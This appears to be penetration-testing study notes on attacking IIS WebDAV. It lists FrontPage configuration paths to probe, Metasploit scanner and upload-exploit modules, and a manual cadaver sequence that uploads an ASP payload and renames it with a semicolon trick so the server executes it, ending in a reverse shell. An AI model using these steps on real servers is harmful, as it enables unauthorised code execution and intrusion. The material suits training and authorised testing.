1025 - NFS/IIS

Identification and Checking

# Check on the Web port (80 ?):
# _vti_pvt for OSCP

/_vti_pvt/access.cnf
/_vti_pvt/service.cnf
/_vti_inf.htm

WebDAV Exploitation using Metasploit

# Checking WebDAV using metasploit
use auxiliary/scanner/http/webdav_scanner
set rhosts <IP>
run

# Content discovery using metasploit
use auxiliary/scanner/http/webdav_website_content
set rhosts <IP>
run

# Checking authentication using metasploit
use auxiliary/scanner/http/ms09_020_webdav_unicode_bypass
set rhosts <IP>
run

# Upload exploitation using metasploit
use exploit/windows/iis/iis_webdav_upload_asp

Manual WebDAV exploitation (cadaver)

cadaver http://IP/

# Goal is to upload file on IIS Server.
ls 

# Find a directory where we can upload.
cd <path>

# Test for upload
put /path/to/test.asp test.asp

# Upload payload
put /path/to/payload.asp longnamebrotesttest123456789.txt

# Copy and rename payload
copy longnamebrotesttest123456789.txt longnamebrotesttest123456789.asp;.txt

# Access (should execute the ASP content)
http://IP/_vti_pvt/longnamebrotesttest123456789.asp%3b.txt
        
# Then go for reverse shell